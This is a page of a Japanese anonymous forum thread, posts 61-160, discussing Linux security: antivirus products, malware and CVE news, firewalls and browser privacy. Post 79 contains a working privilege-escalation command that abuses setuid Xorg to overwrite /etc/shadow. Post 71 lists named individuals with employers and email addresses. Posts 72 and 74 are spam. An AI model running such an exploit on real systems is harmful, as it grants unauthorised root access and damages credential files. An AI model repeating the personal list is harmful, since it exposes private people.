Linuxセキュリティ総合スレ [無断転載禁止]©2ch.net

Linuxセキュリティ総合スレ [無断転載禁止]©2ch.net (468ﾚｽ)
上下前次 1-新

61: 2017/04/30(日)14:38 ID:6nvs6+SR(1) AAS
んだんだ !

62: 2017/04/30(日)19:21 ID:K1kIRV9a(1) AAS
clamとかselinuxとか、皆さん使っていますか？

マシンの使用用途によりけりだとは思いますが、
僕の自宅鯖はfail2banだけです。
有用な物や便利な物があれば教えて欲しいです。

63: 2017/05/09(火)10:29 ID:6kIUOBHa(1) AAS
他人のサーバ管理してるけど、
今までosの脆弱性突かれてどうこうてのは
無いなあ

過去10年起きたのは、全てユーザーの問題
クソみたいなパスワード突破されたとか、
ゴミみたいなコードからのインジェクションとかのみ

64: 2017/06/16(金)09:15 ID:Cv6QgGNP(1/2) AAS
今年も夏を乗りきれず逝く小型PCがいるのでしょうね

65: 2017/06/16(金)09:16 ID:Cv6QgGNP(2/2) AAS
誤爆失礼

66(2): 2017/07/03(月)23:36 ID:cDHqg+NI(1) AAS
openssl enc -e -aes256
で暗号化してたファイルが、急に、
openssl enc -d 〜
で開けなくなりました。

ファイルが壊れたかとめちゃくちゃ焦ったけど、
タイムスタンプは去年のまま変化なし。
本家から、1.0.2lを落としてコンパイルした実行ファイルからだと
問題なく開けたからファイルの問題ではない模様。
1.1.0のバグですか？
#確か2ヶ月前ぐらいだとパッケージインストールされている
省2

67(2): 2017/07/04(火)01:23 ID:RdyHvcf/(1) AAS
>>66
くだらねえ質問はここに書き込め！Part 228
2chｽﾚ:linux

で聞いたほうが良いと思う

68: 66 2017/07/05(水)00:22 ID:uEgHtGC3(1) AAS
>67
ありがとう。
次回からそうするわ。

ちなみに、今回のは下記参考に自己解決したっぽい。
-md md5付けたら、現行1.1.0でもファイル開けました。

外部ﾘﾝｸ:github.com

外部ﾘﾝｸ:unix.stackexchange.com

69: 2017/09/07(木)19:37 ID:NhVQ+S22(1) AAS
すまん誰か教えてくれ！

全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、
設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い？

70: 2017/10/16(月)19:17 ID:AvEU8VfP(1) AAS
AA省

71: 2017/11/03(金)21:09 ID:UMEHXcXh(1) AAS
【日立製作所】焦土戦

セキュリティの基本は尖らないこと、目立たないこと。隠すこと。　バカ。

新名主　隆志 TIS shimmyozu.takashi@technopro.com
色田　眞吾日立製作所 Shikita.Shingo@technopro.com
八木　一暢 TIS yagi.kazunobu@technopro.com
水野　潤ﾊﾏｺﾞﾑｴｲｺﾑ Mizuno.Jun@technopro.com
佐々木　優也（首都圏第1支店案件） sasaki.yuya@technopro.com
佐々木　健太日立製作所 sasaki.kenta@technopro.com
中野　洋行 NSSLCサービス Nakano.Hiroyuki@technopro.com
永井　真祐子富士ｿﾌﾄ nagai.mayuko@technopro.com
省3

72: 2017/12/29(金)13:14 ID:S/CsVkMC(1) AAS
誰でも簡単にパソコン1台で稼げる方法など
参考までに、
⇒　『宮本のゴウリエセレレ』というブログで見ることができるらしいです。

グーグル検索⇒『宮本のゴウリエセレレ』

HRT6GIPYTB

73: 2018/04/11(水)07:03 ID:9VtMkuZE(1) AAS
AA省

74: 2018/05/22(火)11:10 ID:Czl6p0FW(1) AAS
僕の知り合いの知り合いができた副業情報ドットコム
関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法　モニアレフヌノ』

BTBIK

75: 2018/05/26(土)09:20 ID:c6Ml0Dod(1) AAS
【緊急】LinuxベースのルーターやNASに感染するマルウェア「VPNFilter」、54カ国50万台に感染か
2chｽﾚ:news

76: 2018/05/26(土)12:43 ID:H0+abEbN(1) AAS
大問題じゃないか

77: 2018/05/27(日)16:31 ID:QzfBv+yQ(1) AAS
Windowsのセキュリティにはうるさい犬厨もそっ閉じ。つまり、犬問題ｗ

78: 2018/07/08(日)20:50 ID:QTYf4jMn(1) AAS
AA省

79: 2018/10/31(水)11:46 ID:XLo7vX23(1) AAS
suid付きXorgを使ったroot昇格法
外部ﾘﾝｸ:www.exploit-db.com
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
xorgはフォントパスのリストをそのままログに書き込むことを利用してる
(shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ)

80: 2019/03/10(日)12:39 ID:BHkfBLF0(1) AAS
AA省

81: 2019/05/24(金)01:31 ID:WQ5DwMzT(1) AAS
　　彡⌒ ミ
　 ( ´ ･ω･)　呼んだ ?

82(3): 2019/05/31(金)12:30 ID:bdQbsGXY(1) AAS
Linuxを狙うマルウェア「HiddenWasp」に注意　2019/05/31 06:55　後藤大地
外部ﾘﾝｸ:news.mynavi.jp

Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を
発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。

このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが
できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。

・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp
は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に
リモートコントロールするために開発されている
・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が
省9

83(6): 2019/06/01(土)00:37 ID:/N3jDoCj(1) AAS
>>82
これはひどい

俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな
Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、
Linuxにはこれがないからな

SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい？)
RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ？

84: 2019/06/01(土)03:51 ID:BeN0lDY7(1) AAS
Linuxだから安全です。

85(2): 2019/06/01(土)08:23 ID:0WGBvA8D(1) AAS
ウィルス検体を各所に送り対応が早いとこは半日だったが
ノートンは3日後だったことがあった

86(2): 2019/06/01(土)23:05 ID:aQmSSgBv(1) AAS
>>83
毎日更新してるんじゃないかな

ノートンやトレンドマイクロが対応してない最新のウィルスを先んじて検出したことがあったし、古い日付になってる定義ファイルはベースとなるやつの日付だと思ってる。

87: 83 2019/06/02(日)01:29 ID:Zexh2AIq(1/2) AAS
$ sudo /opt/sophos-av/bin/savupdate
次のバージョンをアップデート中です - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
Updating Sophos Anti-Virus....
Updating SAVScan on-demand scanner
Updating Virus Engine and Data
Updating Manifest
Update completed.
次のバージョンにアップデートしました - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
sdds:SOPHOS からの Sophos Anti-Virus のアップデートに成功しました

$ sudo /opt/sophos-av/bin/savdstatus --version
省12

88: 83 2019/06/02(日)01:30 ID:Zexh2AIq(2/2) AAS
>>85-86へね

89: 83 2019/06/03(月)00:52 ID:LINEVdyy(1/2) AAS
>>85-86
ここ見たらやはり1日1回ぐらいは更新されてそう
実際俺のSophosは普通に6/2更新されてた

どうも"脅威データリリース日 = 2019年05月07日 00時00分00秒"と
ウイルス定義ファイル更新日は違うらしい

ウイルス定義ファイル更新日もちゃんと書けよ＞Sophos

Sophos Anti-Virus: ウイルス定義ファイル (IDE ファイル) が最新の状態にアップデートされているかどうかを確認する方法
外部ﾘﾝｸ:community.sophos.com

90: 2019/06/03(月)02:02 ID:jJq3PPoG(1/2) AAS
野良アプリをたくさん入れるWindowsではウイルス検知ソフトが不可欠だね。

91: 2019/06/03(月)02:06 ID:jJq3PPoG(2/2) AAS
しかし、経験上、ウイルス検知ソフトはそれほど当てにできない。
世に知れ渡っていないウイルスが仕込まれていた場合に
ウイルス検知ソフトがそれを正しく検出してくれることはまれ。
何ヶ月か何年かあとになって改めてチェックしてみると検出される場合がある。
でもダウンロードあと、そこまで待ってインストールする人はいない。

92: 2019/06/03(月)08:05 ID:eMJGOUo4(1) AAS
>>82
これの元記事によるとvirustotalで引っかからない
画像ﾘﾝｸ[png]:www.intezer.com
つまりノートンだろうが何だろうが脅威としないで放置されるということ
感染経路はわからんが野良危険ということだろう

93: 2019/06/03(月)22:51 ID:sgwkICkl(1) AAS
>>82
これは具体的にどう注意したらいいんだ？

94: 83 2019/06/03(月)22:56 ID:LINEVdyy(2/2) AAS
やはり、Sophosのウイルス定義ファイル更新は1日1回はあるな
↓となってるから(途中に更新あったかは知らんが多分ないだろ)

昨日
<published>2019-06-02T13:03:35</published>
今日
<published>2019-06-03T13:07:34</published>

95(1): 2019/06/04(火)11:45 ID:JnEdCGFR(1) AAS
ソフォス個人情報入れないとダウン出来ないの？

96: 83 2019/06/04(火)23:57 ID:8eAlB9kG(1) AAS
>>95
全部、適当に入れればいいよ
メアドは@と.orgとか.comは入れないとだめだけど、これも適当で大丈夫

97: 2019/06/05(水)09:35 ID:2u//H+UO(1) AAS
電話番号とか住所も？

98(1): 2019/06/05(水)21:45 ID:1PL8mpQb(1) AAS
電話番号、住所って書く欄あったっけ？
あったとしても、100%適当で通るよ
役職･法人名も適当でおk

国、県、郵便番号は日本、東京、1000000でおk

ちなみにLinux版はこれね
外部ﾘﾝｸ[aspx]:secure2.sophos.com
外部ﾘﾝｸ[aspx]:www.sophos.com

ここからいって普通に全部適当に入力しおわったら、自動でダウンロード始まるよ

99(1): 2019/06/06(木)13:34 ID:Vt0/9sNy(1) AAS
>>98
都道府県がなぜか受け付けてくれない

100(1): 2019/06/06(木)20:22 ID:yFuR+pcY(1) AAS
>>99
先に国名で｢日本｣選んだら都道府県欄に▲▼が出て、普通にマウスクリックで｢Tokyo｣が選べるようになるでしょ

国名：　日本
都道府県：Tokyo
郵便番号：100-0000

で大丈夫だよ

101: 2019/06/07(金)09:06 ID:boyNvVP0(1) AAS
>>100
▲▼が出てこない

102: 2019/06/07(金)20:09 ID:/Sk2vmHZ(1/2) AAS
ブラウザでsophos.comのCookeiとJavaScriptオンにしないとだめだよ
オフになってるんじゃない？

103: 2019/06/07(金)21:33 ID:yVEJ6IS3(1) AAS
Symantec Endpoint ProtecitonｍｐLinux用クライアントをインストールしてみたんだが、あかんファイルは警告無く消し、しかも事後報告が無いのな
これはちと使えないわ

104: 2019/06/07(金)23:40 ID:/Sk2vmHZ(2/2) AAS
Symantecのって無料版あったっけ？

105: 2019/06/08(土)02:35 ID:/huWGbTD(1) AAS
Symantec Endpoint Protection for linux良さそうだが、
1年間9500円アップグレード4700円って高いな

ライセンスだけでメンテナンス不要版もあるの？

値段はここの43ページ
外部ﾘﾝｸ[pdf]:www.symantec.com

106: 2019/06/10(月)15:44 ID:9N/TTeW/(1) AAS
LinuxでUEFIスキャナーがついたアンチウィルスソフトってありますか？
ESETはWIn版にはあるみたいだけど、Linux版にはないみたいだし。
UEFIの脆弱性(Intel ME)を考えたらLinuxパソコンの最大の弱点はUEFIだと思うのですが。
オープンソースで誰か作ってくれないかな・・・

107: 2019/06/18(火)02:35 ID:AVJfVicP(1) AAS
マイクロソフト、Azure顧客にEximワームに注意を呼びかけ
Catalin Cimpanu （ZDNet.com）翻訳校正：編集部 2019年06月17日 10時47分
外部ﾘﾝｸ:japan.zdnet.com

　Microsoftは米国時間6月14日、「Exim」経由で拡散するLinuxのワームについて、一部の
Azureも影響を受けるとしてAzure顧客向けに警告を出した。

　このワームは米ZDNetが6月13日に最初に報じ、その後詳細情報がレポートされたもので、
CVE-2019-10149の脆弱性を利用してEximメールサーバーに感染する。この脆弱性は、悪用
されると攻撃者が遠隔からコマンドを実行してパッチを当てていないシステムを乗っ取る
ことができるというものだ。

　ワームはこの脆弱性を利用してサーバーを乗っ取り、他のサーバーをスキャンして感染を
省6

108(1): 2019/06/18(火)17:26 ID:6P/bvjY8(1) AAS
Netflix報告： Linux Kernel又はFreeBSDのリモートから攻撃可能な脆弱性(TCP SACK
PANIC) (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-5599)
2019年6月18日 05:11　Kazuki Omo
外部ﾘﾝｸ[html]:security.sios.com

こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面和毅です。

06/17/2019にNetflixからFreeBSDとLinux Kernelに対して、幾つかのTCPの脆弱性に関する
アドバイザリーが出されました(CVE-2019-11477, CVE-2019-11478, CVE-2019-11479,
CVE-2019-5599)。アドバイザリーは最小セグメントサイズ(MSS)とTCP SACKに関するものに
なります。最も深刻な「SACK Panic」と呼ばれるものは、最近のLinux Kernelにリモート
からKernel Panicを引き起こすことができます。Netflixの方でPatchも提供されています。
省2

109: 2019/06/22(土)09:34 ID:BWxAJ8Sj(1) AAS
>>108に関連して、アップデートが大量に来ている。

また、
◆snapアプリのアップデートはaptコマンドでは不可能である。

初心者向けに、Ubuntuを例にセキュリティーアップデートの手順を示す。（Kubuntu、Xubuntu、LubuntuなどのUbuntuフレーバーたちも同じ）

（１）ターミナルを開き、下記のコマンドを打ち、最新情報を取得する。

$ sudo apt update
省12

110: 2019/07/03(水)23:55 ID:OptOlEBI(1) AAS
>>1
Linuxなんて使わない。

以上。

111(1): 2019/09/29(日)21:20 ID:Nip3Jzi1(1) AAS
　彡⌒ミ
　（,,・_・）.｡ｏＯ（毛深くなりたい・・・ )
ヾ(,_ｕｕﾉ

112(1): 2019/10/13(日)01:09 ID:ueikBXbu(1) AAS
Google､Androidアプリでアップデートを各ユーザーに強制する方法を発表 | TechCrunch Japan
外部ﾘﾝｸ:jp.techcrunch.com

113: 2019/10/25(金)00:20 ID:j4GkuklA(1) AAS
>>6
それ違う
負けないためには、だね

コモドでいいよな？

114(1): 2019/12/12(木)00:50 ID:jaG34Ck9(1/2) AAS
IntelのCPUに脆弱性 [402859164]
2chｽﾚ:poverty

供給電圧を変化させてプロセッサを攻撃する新ハッキング手法「プランダーボルト」が発見される | TechCrunch Japan
外部ﾘﾝｸ:jp.techcrunch.com
Plundervolt
外部ﾘﾝｸ:plundervolt.com

17 名前：番組の途中ですがアフィサイトへの転載は禁止です (ﾜｯﾁｮｲWW 2bc5-3D6L)[sage] 投稿日：2019/12/11(水) 21:19:15.97 ID:x8hKACYL0
電圧変えて何すんのよ
システムダウン？

19 名前：番組の途中ですがアフィサイトへの転載は禁止です (ﾌﾞｰｲﾓ MM39-B8XO)[sage] 投稿日：2019/12/11(水) 21:24:40.54 ID:/b3E3oTYM
省5

115(1): 2019/12/12(木)02:35 ID:QpDguOY0(1) AAS
Linuxだから安全です。

116: 2019/12/12(木)19:43 ID:jaG34Ck9(2/2) AAS
>>114続き

44 名前：番組の途中ですがアフィサイトへの転載は禁止です (ﾜｯﾁｮｲ 5720-kui+)[] 投稿日：2019/12/12(木) 00:45:08.31 ID:gd2ZuGmF0 [1/2]
>1 >19 >26
なにこれ？
PC起動してないとCPUコントロール出来ないよね？

もしかして､ハードディスク暗号化してるPCを起動して､
暗号化解除する前にこの脆弱性使うと暗号化解除出来ちゃうとか？

>プロセッサ内で隠蔽されている暗号鍵
>秘匿領域
ここに何が格納されてるのか分からん
省14

117: 2019/12/13(金)19:09 ID:ESmGY9a7(1/2) AAS
>>115
コアダンプしそう

118: 2019/12/13(金)19:14 ID:ESmGY9a7(2/2) AAS
Ubuntuアップデートしたらマイクロコード降ってきたけどこれかね
流石にそこまで早くないか

119(1): 2019/12/16(月)00:27 ID:Oy6287lw(1) AAS
MicrosoftがUbuntu用のDefender出すんだって？

120: 2019/12/16(月)05:28 ID:AxOoqKNy(1/2) AAS
LinuxサーバーはAzureしか選択肢が無くなったかもかも。

121: 2019/12/16(月)06:38 ID:AxOoqKNy(2/2) AAS
iOSもカバーしてるからAzureが本命かもしれないよ。
WSLがどうでも良いわけじゃないだろうけど。

122(1): 2019/12/16(月)20:16 ID:F52Y2AF9(1) AAS
>>119
MSの個人情報搾取に耐えかねてubuntuに逃げてきたのに
追いかけてくるってか...

123(1): 2019/12/17(火)02:23 ID:eJqKdH1L(1) AAS
>>122
MSってそんな個人情報抜いてるの？
Skypeで抜いてるのにはびびったが｡
あれはそこそこ信用してただけにびっくりした｡
Skypeごときの情報抜かないだろうって思ってた｡

MSってGoogle並みに個人情報抜いてるの？
Googleは怖くて使えんわ
あんなの住所氏名電話番号全部バレてるだろ

124: 2019/12/17(火)03:54 ID:+GuS9PLu(1) AAS
くこの板の一部の信者はMSに親を殺された！とかわめいてるけど、実はgoogleの方がヤバいっていうね

125: 2019/12/17(火)07:05 ID:BN1fWjc1(1) AAS
ユーザーはキンタマ握られてるから誰も言わないだけで一番ヤバいのはApple

126: 2019/12/17(火)10:14 ID:d36jgmOT(1) AAS
最近はWindowsのアカウント作る時にできるだけMSアカウントを
作らせるよう誘導してくるな
Win8あたりからだった記憶があるけど、Win10が大型アップデート
するたびにどんどん露骨になってる印象

127: 2019/12/17(火)10:37 ID:h64x6iyX(1) AAS
たしかに。

128: 2019/12/17(火)21:04 ID:IhVBQ6dn(1) AAS
OS以外のファイルはゴッソリ抜かれてるのに
Windows10とかOffice365とか無思慮にまして仕事で使ってるヤツの気が知れんわ

129: 2019/12/17(火)21:15 ID:486GIvh4(1) AAS
チョロメや考えなしに派生したクロを入れるのも
泥棒の手を引いて家ん中案内するようなもんだしね

130(1): 2019/12/18(水)13:16 ID:b8AkMopr(1) AAS
どれ使うのがええのん？
opensuseとfirefox？

131(3): 2019/12/18(水)20:51 ID:ng+ewP2B(1) AAS
俺はwinの時sandboxie上でcookieや履歴の設定をユルユルにしたfirefox使ってweb見終わったら丸消ししてたんだが
ubuntuにしてからは気軽に使えるsandboxが見当たらないんで仮想マシンにZorin LiteとFirefoxだけ入れてzipして
やはりweb見終わったら仮想マシン丸消ししてその都度zipから戻してる
多少手間だがこれならいくらcookieやcanvas喰おうがいつもキレーなブラウザでインターネッツできると思ったんだけどね
砂箱スレでdockerもススメられたけど dockerはなんか違うかな？と思ったわ

132: 2019/12/18(水)23:21 ID:Ghj3q23V(1) AAS
【緊急警告】Google Chrome、Windows PC上の事実上全てのファイルを恒常的にスキャン
2chｽﾚ:news

133(2): 2019/12/19(木)13:08 ID:eQXTO88z(1) AAS
>>130
firefoxに余計な機能をブロックするuser.jsを育てたものを使ってる
デフォルトだとGの手が伸びてるし（safebrowsing）、テレメトリその他有効になってる…
GNUのicecat（firefox系）も良い感じ

>>131
firejail --private=<専用の一時ホームディレクトリ>　とか？
canvasは個別に対応が必要だと思う

134(1): 2019/12/19(木)15:29 ID:hhS7ytBr(1) AAS
>>133
user.jsは一時期手を出してみたけど「これワザとやってんじゃないの？」っていうくらいあの設定ワードって言うの？
about:configで左側に表示されるワードが余りに頻繁に変更されるんで根負けしてバンザイしたわ

＞canvasは個別に対応が必要だと思う
とりまCanvasBlock入れてるけどOPTIONは内容が意味フで何言ってるかわかんないから手がつけられないでいるわ
やっぱ色々と設定いじった方がいいもんなの？

135(1): 2019/12/20(金)02:13 ID:3v00n4yQ(1) AAS
operaやvivaldiはどんな評価やろ

136: 2019/12/20(金)08:11 ID:W5p7NQnV(1) AAS
GoogleがChromeやFirefox以外のブラウザを弾くようになって無理

137: 2019/12/20(金)20:28 ID:BMpjrsOC(1) AAS
つ参考

Browser Fingerprinting対策ツールの評価(pdf)
外部ﾘﾝｸ:ipsj.ixsq.nii.ac.jp

Web Browser Fingerprint解説ページ
外部ﾘﾝｸ:www.saitolab.org

138(2): 2019/12/21(土)16:40 ID:P2W6B/wx(1/2) AAS
まじで教えてチョメ　クロ　危ないんですか？
火狐は大丈夫なら　前２者は早速削除したいと思います。

139(2): 2019/12/21(土)16:56 ID:P2W6B/wx(2/2) AAS
Sicklylifeさんはファイアーウオールは有効にしなくてもよい
とありますので、設定していませんが、入れれば幾らかでも
安全になるのでしょうか

140: 2019/12/21(土)20:37 ID:8u1F/kP3(1) AAS
>>138
Linux用ブラウザーを狙う奴なんていないから心配すんな。
あ、ブラウザー拡張機能は別な。拡張機能はOS問わずヤバいものがあるかもしれん。

>>139
例えばUbuntu新規インストしてupdate、dist-upgrade、rebootした後、
すぐにgufw入れてファイアーウォール有効にしても意味ないでしょ。
よく分かんないなら、とりあえずファイアーウォールは有効にしとけば？

141: 2019/12/21(土)21:33 ID:2yt7G6Gl(1) AAS
>>138
チョロメが個人情報泥棒ブラウザなのは周知の事実
何年か前からwin10にタメ張ってかなり大規模に盗みやってるらしいゾ
Win版のチョロはアンインストールしても泥棒機能はOSの深いトコで生き続けるらしいから
もし無しにしたいのならOSの入れ直ししかねーんじゃね？
そんでせっかく金使って開発した泥棒機能をLinux版には入れていないなんて甘い見通しは無いと思うが？
ゴキグルから見たらwinユーザーもLinuxユーザーも同じ金だろうに
クロムもソースからゴキグルと通信する部分を削除していないのはアウトだと思っていーんじゃね？

142: 2019/12/22(日)05:32 ID:F7RmFDTN(1) AAS
>>139
セキュリティは上がる、とは言える
最初はgufw,慣れればiptablesがおすすめ（FWというかネットワークの詳細なコントロールが出来る）

例えばFW無しだと、WANインターフェイスか0.0.0.0でリッスン中のプロセスがあれば外から繋がる
これが設定ミスや脆弱性から悪用に発展する可能性、どんなプログラムを走らせてるのかバレる、DOSの可能性
ルーターの内側に居ればベーシックなFWの内側に居るのに近いけど、アプリがUPnPで勝手にルーターでポートを開ける事も無理じゃない
LAN内の相手からは普通に繋がるし、必ずしもルーターの内側にいるのか？リッスン中のアプリに設定ミスや脆弱性は無いのか？
FWはそういう可能性をカット出来る（公開する意図のない宛先には）

不要なアタックサーフェイスは狭めるのがセキュリティの基本

143: 2019/12/22(日)10:24 ID:QiAxui6d(1) AAS
小手先だけで、基礎の教養なしにubuntu を使っている小生には
ほとんど判りませんが、兎に角拡張機能は避ける、fireWallは有効にしてみました、
ご教示有難う存じました。

144(1): 2019/12/23(月)03:58 ID:fOOPeHWr(1/3) AAS
>>134-135
Canvasってなんだっけ？
CanvasってJavaScriptオフだと機能しないよね？
俺の勘違い？

145(1): 2019/12/23(月)04:06 ID:fOOPeHWr(2/3) AAS
Ubuntu18.04使用でブラウザはFirefox､Torbrowserしか入れてないわ
Chromeは論外で他に選択しないからこの2つ以外入れてない

Torスレでもなんか話題になってたけど､
普通のブラウジングするのにTorbrowserのTor機能だけ切るのはどうなの？

TorBrowserもFirefox基盤だけど､
>>133の
＞デフォルトだとGの手が伸びてるし（safebrowsing）、テレメトリその他有効になってる…
にはなってないよね？
なにせTorBrowserだし･･･

146: 2019/12/23(月)04:54 ID:fOOPeHWr(3/3) AAS
>>131
＞ubuntuにしてからは気軽に使えるsandboxが見当たらないんで
＞仮想マシンにZorin LiteとFirefoxだけ入れてzipして
＞やはりweb見終わったら仮想マシン丸消ししてその都度zipから戻してる

なんでこんなめんどくさいことしてるの？
普通にFirefoxの全履歴削除すれば全部消えるんじゃないの？
UbuntuのJournalに履歴とか残るから？

147: 2019/12/23(月)10:49 ID:1IWvct7N(1) AAS
iptablesはもう古いよ
これからはnftablesだよ

148: 2019/12/23(月)12:05 ID:x1WXtyaO(1) AAS
履歴ｗ

149: 2019/12/23(月)17:23 ID:Y4WL5T53(1) AAS
Oracle Linux の SELinux を disabled にしたら SSH で接続できなくなるのはなぜですか？

150: 2019/12/24(火)11:41 ID:NeirOfqJ(1) AAS
>>144
ここで言ってるのはfingerprinting技術
WEBにアクセスした時に、環境ごとにユニークな値を生成させて取得（同時にIPや他情報もなるべく取得）
その後IPを変えようがcookieやら消そうが同じようなユニークな値を取って紐付ければ特定に繋がる
ブラウザだとcanvas,audio,rectその他がフィンガープリントするのに使えるらしい
こんな追跡の仕方、技術の悪用に近いと思うけど…、色んな建前を使って取得＆追跡されるのが常だからな

JSを切ればcanvasでは取れないような…？他もかなり良くなる

>>145
利便性とのバランスもあるけど、プライバシー重視なら俺もTor切ったTorBrowserは手っ取り早いと思う
プロ？集団がプライバシー重視でアンチフィンガープリンティングにも力を入れて設定＆開発したんだ
省2

151: 2020/01/28(火)22:15 ID:zrSY3ZQs(1) AAS
無料ウイルス対策ソフトのアバストAvast、おまえらのネット閲覧データを販売か？ [594632409]
2chｽﾚ:poverty

無料ウイルス対策ソフトのアバスト、ユーザーのウェブ閲覧データを販売か
Carrie Mihalcik （CNET News）翻訳校正：編集部2020年01月28日 11時07分
ウィルス対策ソフトウェアメーカーAvastが、Jumpshotという子会社を通して「機密性の高い」ウェブ閲覧データを販売していると報じられている。
外部ﾘﾝｸ:japan.cnet.com

152: 2020/01/28(火)22:26 ID:msT/XQYC(1/5) AAS
Linuxに関係あるんか？

153: 2020/01/28(火)22:30 ID:meBmn7jU(1/5) AAS
やはり、営利企業がリリースするウィルス対策ソフトには、
用心したほうがいいんでしょう。そもそもなにゆえ無料なのか…

avast は Linux用もあるからね。

154(1): 2020/01/28(火)22:39 ID:msT/XQYC(2/5) AAS
Linux版も無料なのか？

155(1): 2020/01/28(火)22:49 ID:meBmn7jU(2/5) AAS
>>154
今は知らんけど、過去にはあった。

156(1): 2020/01/28(火)22:52 ID:meBmn7jU(3/5) AAS
CNET News 翻訳記事の中には、
「ユーザーのプライバシーと、当社の主力セキュリティ製品で必要なデータ利用とのバランスをとる責任」があることを理解し、重くとらえていると述べている。
と、こんな記事があるのね。これはGoogleの利用許諾とよく似ているねえ。
やはり、ビッグデータを収集したいわけだ。そうじゃなきゃ、無料はおかしい。

157(1): 2020/01/28(火)22:58 ID:msT/XQYC(3/5) AAS
>>155
今はないとしたらほぼ影響はないか

158(1): 2020/01/28(火)23:02 ID:meBmn7jU(4/5) AAS
>>157
今ないのかどうかは知らないし、avast サイトをのぞきたくはないし。

159: 2020/01/28(火)23:07 ID:msT/XQYC(4/5) AAS
>>158
検索するくらいは出来るでしょ
なさそうだけど

160: 2020/01/28(火)23:09 ID:YOaQ6DqC(1) AAS
数年前に中華資本になったんだっけ？

上下前次 1-新書関写板覧索設栞歴

あと 308 ﾚｽあります
ｽﾚ情報赤ﾚｽ抽出画像ﾚｽ抽出歴の未読ｽﾚ AAｻﾑﾈｲﾙ

ぬこの手ぬこTOP 0.043s